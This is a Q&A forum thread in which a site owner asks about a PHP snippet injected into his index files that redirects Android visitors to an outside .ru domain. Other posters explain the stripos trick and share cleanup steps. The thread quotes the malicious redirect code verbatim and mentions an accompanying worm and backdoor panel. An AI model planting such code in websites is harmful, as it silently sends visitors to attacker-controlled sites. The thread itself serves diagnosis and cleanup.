# Why add "***" in user-agent in this malicious code?

Tags: php, url-redirection

I found the following in every index file of my sites on a server I have.  It looks like its redirecting all android users to some spooky Russian site.

```
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://andsecurity.ru");
die();
}
```

My question is: In the stripos function, they add three asterisks in front of the user agent variable, why would they want to do that?  What does that do?

Comment: The `***` before `$ua` don't seem to actually do anything.  I'm not sure why they are added here.

Comment: I know this is a bit offtopic, but i'm facing the same problem, was you able to find where the malware was infected? I cleaned as much as I could but some index.php and .htaccess are still being modified with the exact code as yours. Could you send me some hint here or to soy [at] marcosbl.com ? Sorry for disturbing !

Comment: Nope, spent 2 days going through server.  It is actually astounding how deeply infected my server is.  Someone recommended using maldet as a more robust and comprehensive solution.  I imagine I'll be trying to implement it in the next few days.

Comment: Same here, but for now I managed to get it fixed with a bit of help from AIDE. First i made broad searches of files containing "eval", then noted a bit of the encoded garbage and searched for that strings. Note I found 2 different ones, one is the worm itself and the other is the "web control panel". After deleting them all I installed AIDE, to avoid this problem in the future, some help here:

http://pka.engr.ccny.cuny.edu/~jmao/node/30
http://www.snekul.com/wordpress/blog/2012/09/27/using-aide-on-ubuntu-12-04-lts-precise-pangolin-and-debian-7-wheezy/

Answer (score 4, accepted):

It could be due to a (previous) bad code or to avoid warnings/errors in responses.

`stripos` returns the possition of second parameter in first one, starting indexes at `0`, so in a bad code `if (stripos($ua,'android'))` the condition would be skipped as `false` in the case the string started with `android`.

Correct solution would be using `===` and `!==`, but prepending a string that wouldn't match prior to the test string, makes any match to be at least at value `1` (`3` in this case), avoiding the need to use `!== false`.

It also covers the case where user-agent is missing to avoid any kind of warning/error at running time.

Comment: Wouldn't the first line of the code trigger `PHP Notice: Undefined index: HTTP_USER_AGENT` upon setting `$ua` if user agent is missing?

Comment: True. Also it seems that `stripos` does not warn if searching an empty string either as I suppossed it would. In any case, that's the only reason I came up to.